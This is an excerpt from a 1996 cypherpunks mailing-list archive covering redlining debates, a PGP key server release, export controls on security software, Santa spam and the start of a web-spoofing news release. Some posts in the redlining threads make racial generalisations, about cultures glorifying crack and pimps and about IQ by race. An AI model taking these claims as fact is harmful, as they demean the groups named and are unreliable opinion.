(for insurance) or defaults (for credit). Thus, smaller businesses
(which are also made more possible by lowering other regulatory
costs) can exist in a deregulated insurance or credit market. The
removal of the current ogliopolistic situation in such markets
for the initial insurance or credit grantor would improve prices.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@MIT.EDU>
Date: Wed, 11 Dec 1996 15:22:49 -0800 (PST)
To: marc@MIT.EDU
Subject: PGP Public Key Server beta release available!
Message-ID: <199612112321.XAA16617@beeblebrox.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The new PGP Public Key Server which has been running on pgp.ai.mit.edu
for the past several months is now available as a beta release.  

This is the first public release of the code, and while it has proven
mostly reliable, it is not guaranteed to be perfect.  Because it uses
hash tables and balanced trees instead of a flat file format, it
trades a disk space for a substantial performance improvement over the
old pgp-based key server.

The PGP Public Key Server home page can be found at
<http://www.mit.edu/people/marc/pks/>.  This page contains links to
the sources, the server running on pgp.ai.mit.edu, and my thesis,
which documents the specification and design of the key server.

If you have any problems, questions, or comments, I read
comp.security.pgp.tech.  That's probably the best forum for discussion
and questions, but you can send me email, too.

In order to have an idea how how many people are using this key
server, if you install it, for public use or not, please let me know.

		Marc Horowitz
		marc@mit.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq85Ce/JP4Ec8n/VAQE+pQP+OOKf9dC06RR/oL+wRPSVBg9TFOrnGhDu
AT+qz2pAOchTnVZqPQKEDUr0mfDqmMhC9CU5oAjS36N3OFJoUwuwHSlt+4Ixnj9A
ld0fVHKhyME4v+F6X/O7g6LOj07y6qIWcQqoGEqyFH08Keso8wXdH83BLjbN/8tl
bwBpSZMUL7E=
=Aqyq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 15:26:32 -0800 (PST)
To: mjmiski@execpc.com
Subject: Re: Redlining
Message-ID: <01ICW68U4ZM2AEL2GZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 16:21:56.21

>Actually, my assertion was that the basic motivation was racism and
>ignorance.  My example of student loan default rates should clear that up.
>College graduates generally live outside of redlines and yet are regularly
>offered credit.  And yet default rates on student loans are outrageous (the
>government backing of these loans is irrelevant to individual
>creditworthiness).

	That some groups not within redlines have high default rates is not
an argument against groups within redlines having high default rates. The
market distortion caused by government sponsorship is certainly relevant to
whether individuals are offered credit; I would suggest that in many cases
the students in question would not be offered credit, as per their high
default rates, if it were not for government sponsorship removing the risk
from the lender.
	You have also not bothered to answer the criticisms from Mr. Rackham
about why, if the sole motivations were racism and ignorance, people would not
be offering the residents of such areas loans; as (he?) pointed out, this would
appear to be a particularly attractive move for middle-class blacks, if your
assertion was the case.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 18:28:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612120227.SAA21192@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 6:24 PM 12/11/1996, E. Allen Smith wrote:
>From:   IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996
>16:21:56.21
>>Actually, my assertion was that the basic motivation was racism and
>>ignorance.  My example of student loan default rates should clear
>>that up.  College graduates generally live outside of redlines and
>>yet are regularly offered credit.  And yet default rates on student
>>loans are outrageous (the government backing of these loans is
>>irrelevant to individual creditworthiness).
>
>That some groups not within redlines have high default rates is not
>an argument against groups within redlines having high default rates.
>The market distortion caused by government sponsorship is certainly
>relevant to whether individuals are offered credit; I would suggest
>that in many cases the students in question would not be offered
>credit, as per their high default rates, if it were not for
>government sponsorship removing the risk from the lender.

I have personal experience with cases where the lender (actually the
company which bought the loan) misrepresented a loan default
apparently in order to get reimbursed by the government.  The
government requires the lenders to make a certain number of contacts
with the borrower before declaring a default.  In this case, the
lender simply lied about the contacts.  Payments had been interrupted
as a consequence of confusion relating to the change in procedure when
the loan was sold.  One presumes that this was not accidental and that
somebody had a roaring little business going.

I have no trouble believing that the student loan market would quickly
dry up were the government to get out of the business.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santa Claus <infoserver@reply.net>
Date: Wed, 11 Dec 1996 15:28:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Merry Christmas, You Punk-ass Mo'-fo's!
Message-ID: <4245130.0C0DKF@reply.net>
MIME-Version: 1.0
Content-Type: text/plain


                              *
                              *
                             /|\
                           ///*\\\
                           *  *  *
                         //\\ * //\\ 
                        * *  *  *  *
                      // \\ // \\ // \\
                          S A N T A 
                            * * *
                      N O R T H  P O L E
                            |  |
                           \____/


    Wherever you go, whatever you do,
    Remember that Santa is always with you.
    I live in your heart, I dance in your soul,
    I show you what love is, and good things to know.

    The Spirit of Christmas spreads all through the land,
    With joy and the giving of gifts you should have.
    But gifts are just one thing to give and to get --
    We wish you much more, far more than that.

    My elves send you pride in whatever you do,
    My reindeer give strength on days you feel blue,
    My wife, Mrs. Claus, grants wisdom and grace,
    Belief in yourself and all you create.

    And me, what do I give? Is there much more?
    Plenty and plenty you won't find in stores.
    I give you the knowledge that you can do more
    Than you ever knew -- of that be quite sure.

    My sleigh's packed with toys, my list sweeps the floor,
    A cup of hot cocoa and I'm out the door.
    Just gaze high in the sky where Peace always soars,
    And you live in my heart as I live in yours.

                           *
                          * *
                         * * *
                       M e r r y
                   C h r i s t m a s 
                          * *
                  S a n t a  C l a u s


---------
This santa poem was sent to you from a person who visited
the ReplyNet site (www.reply.net) and entered your name
and address on our Santa page.  Your e-mail address is
NOT being collected.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 16:45:27 -0800 (PST)
To: EALLENSMITH@ocelot.Rutgers.EDU (E. Allen Smith)
Subject: Re: Redlining
In-Reply-To: <01ICW8E2LDSWAEL2GZ@mbcl.rutgers.edu>
Message-ID: <199612120040.SAA03077@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


E. Allen Smith wrote:
> >> 	The third topic is that one commonly applied idea used by the
> >> proponents of absolute equality is that found in Rawls' _Theory of
> >> Justice_, under which the just outcome is said to be found by a group
> >> of people who do not know what situation they will be in. (This is
> >> a vast oversimplification of the book(s) in question, which upon
> >> closer examination may realize the idea I am about to write down.)
> >> The simplistic conclusion is that everyone will want everything to be
> >> the same, since any individual might be in a bad or good situation. But
> >> if you have a choice between 49 dollars and a 50/50 chance of 0 or 100
> >> dollars, you should take the latter. In other words, a situation in
> 
> >Not necessarily.
> 
> 	With the exception of needing <=49$ to live, under what conditions
> would the former choice be better than the latter choice?

A good question. It is based on the theory that every person has a
"utility" function in their mind. This function determines the "worth"
of money and worthiness of risk. 

If that function as a function of income is strictly concave


 ^
U|
 |
 |         _-
 |      ,~
 |    ,'
 |  .~
 | /
 |/
 ||
 +------------------------------------> money

then the utility of your gamble would be

U(gamble) == 1/2 * U(0) + 1/2 * U(100).

By definition of concavity, it is less than utility of $50.

Whether it would be more or less than the utility of $49, depends
on a consumer, but it may well be that some people will not like
this gamble.

There is much evidence that indeed most (if not all) consumers have
concave utility function.

I know that I would refuse a gamble where I could win $20,000
or get nothing, with equal probability, and prefer to get $9,999
for sure instead.

There is much theory about financial asset pricing that relies on the
assumption that utility functions are concave.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 15:42:57 -0800 (PST)
To: tcmay@got.net
Subject: Re: "Bigotry" and related topics...a brief comment
Message-ID: <01ICW6TO6LV4AEL2GZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  "Timothy C. May" 11-DEC-1996 18:12:33.87

>If anyone has well-formed questions about how redlining and "bigotry" is
>affected by strong cryptography and crypto anarchy, fire away. Just don't
>bury them deep in a long diatribe about the evils of "prejudice" and
>"discrimination."

	Yes... an analysis of the ways in which an insurance or credit
company could keep its disallowed data in secret, with sufficient
incentives for the individuals with knowledge of it not to disclose this
practice, is an interesting topic. One of the more obvious ways is to
subcontract the risk analysis to businesses operating in countries without
such limits, leaving the main insurance or credit company with just the
claims process, reserves management, and paperwork. Unfortunately, as
shown by the EU's attempts to make multinationals doing business there
keep data inside EU borders and under EU privacy laws, countries are
likely to clamp down on this process.

>difficult. The racial and ethnic groups which are most into "victimology"
>are the least successful--which is _cause_ and which is _effect_ may be
>debatable to many of you, but the correlation is very clear....maybe it's
>time they try something different, like getting their culture to embrace
>learning, reading, science, math, and business success, instead of
>glorifying victimization, crack cocaine, basketball stars, and pimps.)

	While I would fully agree with you that such cultural factors
are a considerable amount of the problem, I'd have to call attributing
all of the problem to them an oversimplification. I'd also point out the
cultural factors caused by the development of cultures under uncivilized
(in the sense of lacking cities) and unindustrial conditions, something
that is not helped by the current PC multiculturalist wish to bring such
cultures back. (The reasons for African cultures not developing in this
route are an interesting debate; I find Sowell's argument of lack of
navigable rivers and the presence of various diseases such as malaria
reasonably convincing.) Other factors include the lack of parental
education and nutrition resulting in lower parental IQs resulting in
lower child IQs; interracial adoption, while opposed by the PC types,
is one way to solve this problem. Another factor is lingering racism,
which is regretably still present in subsections of the country.
Hopefully, as various factors promoting large, noncompetitive
corporations (and unions) disappear, the resulting companies will
be forced to be sufficiently competitive to ignore such prejudices.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 11 Dec 1996 18:54:45 -0800 (PST)
To: Alexander Chislenko <alexc@firefly.net>
Subject: Re: WEB: Yahoo/Firefly Website recommendation service
In-Reply-To: <3.0.32.19961211115710.00ce9cb0@pop.firefly.net>
Message-ID: <32AF7367.7982@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Alexander Chislenko wrote:
>   Firefly Network Inc. has just launched a public beta of our website
> recommendation service on My Yahoo!  This service is the result of a
> partnership between Yahoo! Inc. and Firefly Network, Inc. in application
> of Automated Collaborative Filtering (ACF) technology to the Web.
>   It allows users to find interesting websites interest and like-minded
> people, and otherwise help the user navigate the vast domain of sites
> and people in an intelligent and personalized way.

I tried Firefly.  What a waste.  Unless your tastes in most things
entertainment-wise are pretty mundane (music=Pearl Jam, Prince,
other mainstream drek), they won't be able to find a match at all,
no matter how much information you give them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 16:28:43 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Redlining
Message-ID: <01ICW8E2LDSWAEL2GZ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ichudov@algebra.com" 11-DEC-1996 18:34:46.50

>Thanks for an interesting reply.

	Quite welcome. Due to the links to my own field, I've been thinking
about these issues for a bit.

>It is the cross-section test that evidences discrimination: suppose
>we have two large groups with the same credit-related parameters
>(credit history, etc). If one group gets better treatment from a
>bank, I see a discrimination.

	Is it the credit history that should be the same... or the outcomes?
In other words, if two groups of different races are all granted credit and
have equal credit histories, are the default rates greater for one group as
opposed to the other? If so, then there _is_ a fiduciary responsibility by
the bank's directors to not loan to the group that has greater default rates.
	Now, there's the problem in testing this that if a bank (or, more
likely, some loan officers at the bank) is practicing discrimination, those of
the discriminated-against races who do get credit evidently had _something_
that convinced the bank to still offer the people credit. This something may
or may not be controlled for by the credit factors equalization I mentioned
above. If it isn't controlled for, you'll get a bias in the outcome toward
the discriminated-against race being _better_ credit risks than they actually
are, on the average. This would remove any actual evidence of poor credit
riskworthiness on the part of that race (such as for cultural reasons, to the
(highly unfortunate) degree that race and culture are correlated).
	In other words, banks with prejudices (which I do fully admit are
out there) will tend to make any actual differences much harder - close to
impossible, in fact - to see.

>The crucial question is: do we believe that the characteristic
>that we are considering directly linked with future performance?

	As I point out above, studies on this topic are somewhat difficult,
and are prone to being biased in favor of discriminated-against races. (This
isn't even mentioning political biases...) You may or may not be able to
say _why_ a given characteristic is linked with future performance; it's
easy to come up with plausible explanations in most cases.

>This is a valid concern.

	Quite... I seem to recall a story involving a "Handicapper General" -
perhaps someone would recall the title and author? In it, those with higher
IQs were forced to be less intelligent through distractions, those with
greater beauty were forced to wear ugly masks, etcetera.

>> 	The third topic is that one commonly applied idea used by the
>> proponents of absolute equality is that found in Rawls' _Theory of
>> Justice_, under which the just outcome is said to be found by a group
>> of people who do not know what situation they will be in. (This is
>> a vast oversimplification of the book(s) in question, which upon
>> closer examination may realize the idea I am about to write down.)
>> The simplistic conclusion is that everyone will want everything to be
>> the same, since any individual might be in a bad or good situation. But
>> if you have a choice between 49 dollars and a 50/50 chance of 0 or 100
>> dollars, you should take the latter. In other words, a situation in

>Not necessarily.

	With the exception of needing <=49$ to live, under what conditions
would the former choice be better than the latter choice?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 11 Dec 1996 19:24:25 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Official Prediction [was:Re: New export controls to include code signing applications]
Message-ID: <3.0.32.19961211192429.006a5f14@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/enriched

At 05:34 PM 12/11/96 -0800, Timothy C. May wrote:
>They're really looking desperate, aren't they? They try to limit the export
>of crypto software, they try to limit the export of anything with "hooks"
>for adding crypto outside the U.S., they try to limit export of crypto
>knowledge, and here they're even trying to limit _signing_ software?

They have a very simple bottom line. Ban strong crypto. Eliminate loopholes. 

>What's next? Maybe they'll try to limit the dispensing of _legal advice_ by
>U.S. attorneys to foreign clients.
>(I keep using the phrase "they try to" becuase obviously few of these
>schemes to keep the horses in the barn will work.)

Official Prediction (For new readers of this list, once in a while I make an "official prediction". That means the reader is urged to call me on it and, yes, I take bets):

The US will make the following acts illegal and or subject to licensing within two years:
1. Production of strong crypto for sale abroad by a subsidiary of a US corporation.
2. Production of strong crypto for sale abroad, if the project is financed by a US corporation. Alternatively, US companies might be prohibited to financially benefit from such a product.

I am not saying that these acts will be prohibited in all cases. I am saying that they will be prohibited in some cases.





-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
Make your mark in the history of mathematics. Use the spare cycles of
your PC/PPC/UNIX box to help find a new prime.
http://ourworld.compuserve.com/homepages/justforfun/prime.htm


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santa Claus <infoserver@reply.net>
Date: Wed, 11 Dec 1996 16:34:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Merry Christmas, HipXmas-SantaSpam!
Message-ID: <4245141.0C0DKO@reply.net>
MIME-Version: 1.0
Content-Type: text/plain


                              *
                              *
                             /|\
                           ///*\\\
                           *  *  *
                         //\\ * //\\ 
                        * *  *  *  *
                      // \\ // \\ // \\
                          S A N T A 
                            * * *
                      N O R T H  P O L E
                            |  |
                           \____/


    Wherever you go, whatever you do,
    Remember that Santa is always with you.
    I live in your heart, I dance in your soul,
    I show you what love is, and good things to know.

    The Spirit of Christmas spreads all through the land,
    With joy and the giving of gifts you should have.
    But gifts are just one thing to give and to get --
    We wish you much more, far more than that.

    My elves send you pride in whatever you do,
    My reindeer give strength on days you feel blue,
    My wife, Mrs. Claus, grants wisdom and grace,
    Belief in yourself and all you create.

    And me, what do I give? Is there much more?
    Plenty and plenty you won't find in stores.
    I give you the knowledge that you can do more
    Than you ever knew -- of that be quite sure.

    My sleigh's packed with toys, my list sweeps the floor,
    A cup of hot cocoa and I'm out the door.
    Just gaze high in the sky where Peace always soars,
    And you live in my heart as I live in yours.

                           *
                          * *
                         * * *
                       M e r r y
                   C h r i s t m a s 
                          * *
                  S a n t a  C l a u s


---------
This santa poem was sent to you from a person who visited
the ReplyNet site (www.reply.net) and entered your name
and address on our Santa page.  Your e-mail address is
NOT being collected.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 11 Dec 1996 19:38:05 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <199612112346.PAA26588@mailmasher.com>
Message-ID: <32AF7D22.6D7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> At 12:38 PM 12/11/1996, Timothy C. May wrote: By the way, on this
> >oftentimes off-topic issue of "bigotry" and "racism," here's a zinger
> >some of you may not have thought much about. And it's certainly
> >related to the themes of Chaumian "credentials without identity,"
> >which is very much on-topic.
> >Consider a "race credential" offered by some entity. Perhaps one goes
> >down to the local Aryan Nations office and gets one's genetic
> >heritage stamped, or down to the Kwanzaa Youth Center to be similarly
> >stamped....
> >(Why some groups might want this is left as an exercise for the
> >reader.  Perhaps a less-inflammatory example (to some of the
> >sensitive amongst you) might be that some women want to interact in
> >"women only" forums--a clear case of discrimination, no?--and may
> >want a "gender bit" avaiable to display as a credential.)

There are good things to be said for "hanging out with one's own kind" -
sometimes it can facilitate getting things done, by eliminating potential
sources of friction, etc.  OTOH, this is largely a negatives issue, yes?
Looking at positive issues, one could probably find as much interesting
and enlightening in direct contact with persons of other races, religions,
and cultures (if the conflict isn't too destructive), if not more so than
with one's own, when one considers that growth and learning (essential to
good health) bring greater conflict than when one is merely comfortable.

[remainder snipped]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 11 Dec 1996 17:19:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Call for papers :2nd Mac-Crypto Conference Mar 18-20, 1997
Message-ID: <v0300783daed50a5313e4@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: mac-crypto@thumper.vmeng.com
Reply-To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Mime-Version: 1.0
Precedence: Bulk
Date: Wed, 11 Dec 1996 16:33:38 -0800
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
To: Multiple recipients of <mac-crypto@thumper.vmeng.com>
Subject: Call for papers :2nd Mac-Crypto Conference Mar 18-20, 1997

-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

Belive it or not we are going to do it again....

     The Membership of the Mac-Crypto List invites you to
                               The
                           Second-Ever-
                      Not Nearly-Last-Minute-
                     (most likely) Radar-Jammed
                     To-Hell-with-Forgiveness

                           Macintosh
                Cryptography and Internet Commerce
                 Software Development Workshop

                   (ex postcrypto postIdes of march)
		 	 Mar 18 - 20, 1997
                  Apple R&D Campus, Cupertino, CA, USA



If you would like to present a paper or give a talk,
 please contact Vinnie Moscaritolo at <mailto:vinnie@apple.com>



for more info on the damage we did last year check out
http://www.vmeng.com/mc/debrief.html

dont say I didnt warn ya..

-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b5 e29

iQCVAwUBMq9SvPMF2+rAU+UdAQFU1QQAxKrGHgqd6lEdsB5CgMx20GZV29eJ+od2
OOOh/+SLK8WsYUmNIaA+hYXdlCjBzVoFY6WnOgAferyEZe8G97RAZkCmecv0+7IN
XLzw3LXCtsHzyuIi3hjOgpptnBZAscGCc2ZqNd4JineGCTpgn4U4pRaTzvuMajoU
9POCuudysBo=
=IsTO
-----END PGP SIGNATURE-----


Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Wed, 11 Dec 1996 19:11:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Speaking of Redlining....
Message-ID: <Pine.SOL.3.91.961211200743.20030B-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain



Please do not respond on the list, as this does not need to clog it up 
further.

I am 19 years old, and I make 60,000 (verifiable income) per year.  I 
have a 2000 dollar down payment.

NOBODY will give me a loan.  Everyone tells me my credit is fine, and 
yet, I cannot get a car loan to save my life.

I have so far only tried major banks and GMAC finance.

If anyone has any information that could help me find a place in the 
denver area that would give me a car loan (or anywhere really - money 
can be wired from anywhere) PLEASE let me know.

I am trying to get a ~35,000 car loan - so far EVERYONE has just 
straight up told me I am too young (even though I make twice what these 
people make :) )

Thanks...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 11 Dec 1996 20:31:09 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: New export controls to include code signing applications
Message-ID: <3.0.32.19961211203037.006a4e58@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/enriched

At 10:18 PM 12/11/96 -0500, Adam Shostack wrote:
>These are important, and damaging changes to the regulations.  My
>thanks to Lucky for pointing them out.
>
>Previously, authentication technologies, signatures and integrity
>checkers had specific exemptions.

It seems that signature checking software is still exempt. What will be prohibited is signature generating software that generates signatures for signed code if such code performs crypto. Writing such signing software abroad is trivial, as long as you have the private key. So far keys have been exempt from export controls. It will be interesting to find out if the new prohibition will be construed to extend to keying material.

>I suggest those journalists who lurk here call companies like Digital
>Pathways, McAffee, Symantec, and see if they are aware of these
>proposed changes.  

In a way the new prohibition on exports of software that protects against malicious computer damage is even more far ranging. 

To quote again from the new list of enumerated items subject to export controls: "c.3. "Software" designed or modified to protect against malicious computer damage, e.g., viruses;"

That includes every firewall product, every virus checker, every data security product, and this regardless if the product uses crypto or not. The new regulations go way beyond controlling crypto. The USG, in a massive power grip, has put data security as a whole on the export control list.

One likely explanation for this unprecedented move is the USG's desire to gain further leverage with US software companies. If they don't include GAK, they not only won't export their crypto software, they won't export their other security related products either. Which may mean for some companies that they won't export anything at all. That would be a mighty big stick.




-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
Make your mark in the history of mathematics. Use the spare cycles of
your PC/PPC/UNIX box to help find a new prime.
http://ourworld.compuserve.com/homepages/justforfun/prime.htm


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 20:56:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Debate on this list
In-Reply-To: <199612112315.PAA21045@mailmasher.com>
Message-ID: <v03007800aed53e0402d1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 PM -0800 12/11/96, Huge Cajones Remailer wrote:

>Didn't Tim May originate the "Generation of Science" thread or,
>earlier, the sliderule thread?  I don't think either topic can said to
>be strictly cypherpunk unless a discrete logarithm sliderule has been
>invented.
>
>The truth is that I enjoyed those threads as did most others on the
>list.  I would like to see more like them.  And, I dare say that my
>posts are more worthwhile than 7 out of 8 posts we've been seeing on
>the list lately.

Of course I write stuff that is not necessarily "crypto relevant"...we all
do. The list is a discussion of issues important to the members of the
list: there has never been a formal charter or set of rules on what is
"allowed" and what is "not allowed." However, traditionally libertarian vs.
socialist debates are seldom useful, and about as welcome on any list (even
libertarian lists) as are debates about abortion, gun control, and other
such contentious issues.

And my point about preferring a "well-formed question" was related to what
I said about the huge back-and-forth debate between Red Rackham and Matthew
M., which I found too convoluted to follow. I favor well--formed essays; I
try my best to write such essays myself.

Recall that I specifically said: "Many of the posts by Matt M. and "Red
Rackham" and others have been so massive, containing paragraph-by-paragraph
rebuttals of political and ethical points, that I've just given up on
trying to
follow the points." This is what sparked my request for well-formed
questions. Interestingly, Matthew M. did just this, in private e-mail. He
phrased several questions about crypto anarchy, and implications for the
underclasses, and I answered his questions. He is free to post his
questions and my answers if he wishes to.


>Point 1: You obviously find the subject interesting enough to comment
>on it.  Others probably also find it interesting.

Personally, I think the implications of strong cryptography for "redlining"
are indeed on-topic, and interesting. I said as much, and have written
several articles yesterday and today on precisely this topic. What I
_don't_ find very on-topic, personally, are rambling debates about social
justice, labels such as "bigoted" and "racist," and what governments should
do to subsidize those who have failed to prepare themselves for the modern
world.

>Point 2: Excuse me if I am wrong, but your comments look to me to be
>precisely on topic for this list, anyway.

Thank you. I said it was interesting, just not the "traditional libertarian
debate" about social justice and "what to do about the poor." It is rarely
fruitful.

>This obsession of "on topic/off topic" is not healthy for the list.
>It stifles brainstorming and the free exchange of ideas.

I'm not so obsessed with this...you must be knew to the list, or you'd've
known of my views on this.

>P.S. Sorry for the length of some of the messages.  That Miszewski had
>the temerity to actually stand up for his beliefs, so it was
>unavoidable.

I have a feeling not more than 5 people even skimmed your extremely long
and detailed messages replying to Matthew (in my case, I gave up after
several screenfuls, with my scroll bar showing I was only partly through
the message!). You might consider instead just picking a couple of his
points and using them to make your own points...responding to every single
paragraph is rarely effective.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 11 Dec 1996 21:18:48 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Redlining
In-Reply-To: <199612120227.SAA21192@mailmasher.com>
Message-ID: <32AF9518.3B1F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> At 6:24 PM 12/11/1996, E. Allen Smith wrote:
>>From: IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996
>>>Actually, my assertion was that the basic motivation was racism and
>>>ignorance. My example of student loan default rates should clear that up.

[snip]

> I have no trouble believing that the student loan market would quickly
> dry up were the government to get out of the business.

Hallelujah!  The current college system is a fatcat and indentured
servant system - the tenured staff (and not necessarily the ones who
provide the most service) at the schools suck up the big bucks, and
the grads "owe their soul to the company store", just like the serfs
of a bygone era.  The more things change....

Actually, when I first came to L.A., there was a pretty good college
system, where most kids with minimal finances could go for cheap, in
some cases nearly free.  But this was taken over (co-opted) like so
many other programs that can be turned into cash cows.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 11 Dec 1996 18:13:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <199612112233.QAA02084@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.961211211200.1697A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 11 Dec 1996, Igor Chudov @ home wrote:

> I do not see any reason why Java code cannot be compiled. I think that
> now there are java compilers available. Maybe even browsers will have
> smarts to compile code that they execute.

I assume you mean compiling Java bytecode to native machine code.  I don't know
of any program that can do this, but Cygnus is developing a Java compiler that
compiles Java to a stand-alone executable.  Details at
http://webhackers.cygnus.com/webhackers/projects/java.html .

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMq9q/izIPc7jvyFpAQEmqAf/RVn2U+qXk3GZkfwi7NrA6UbbGhbCAp3u
hIGUpHyNYPKmcYSrFRuxZN+X0umjkBFc8DVGp/mhY+Sp7W/HT53r9I3sTd8uBs/r
z/KtRq3B8eM3rIJTGgSuOaDH4CG9JCAhQvS1HjaHLtKwKeUeQImQ79tpyt9i1DH5
5OvJVzyKQ1/EBKU4hTa+gf8NF7s8xIA6TULCnC5QJPpM+k0YljRUpYG1aXNHYwbI
dvylH+9ppYkoeFV2FSQuSS1ElIfLoyzYHlAjOqh5CE0+WqGAh1gDFPJ3fg6hlP73
2BAC9Iid5kWv9Eqi46d6XoJAXukphH9YRAqRcfCNH2kZvgNlPmx95w==
=yo31
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Wed, 11 Dec 1996 21:37:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NEWS: Web Security Hole Revealed
Message-ID: <3.0.32.19691231160000.006993e8@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 12/11/96 -0500, you wrote:
>X-Sender: okeefe@olympus.net
>Mime-Version: 1.0
>Date: Wed, 11 Dec 1996 19:32:32 -0800
>To: N E W S   R E L E A S E  <IPS@olympus.net>
>From: "Steve O'Keefe" <IPS@olympus.net>
>Subject: NEWS: Web Security Hole Revealed
>
>BREAKING NEWS
>For Release Thursday, December 12, 1996
>
>MAJOR  WEB  SECURITY  FLAW  REVEALED
>
>(New York) -- Edward Felten, head of Princeton University's
>Safe Internet Programming Team (SIP), today revealed a
>major security flaw in the Internet's World Wide Web.
>Called "web spoofing," the breach allows any Internet
>server to place itself between a user and the rest of the
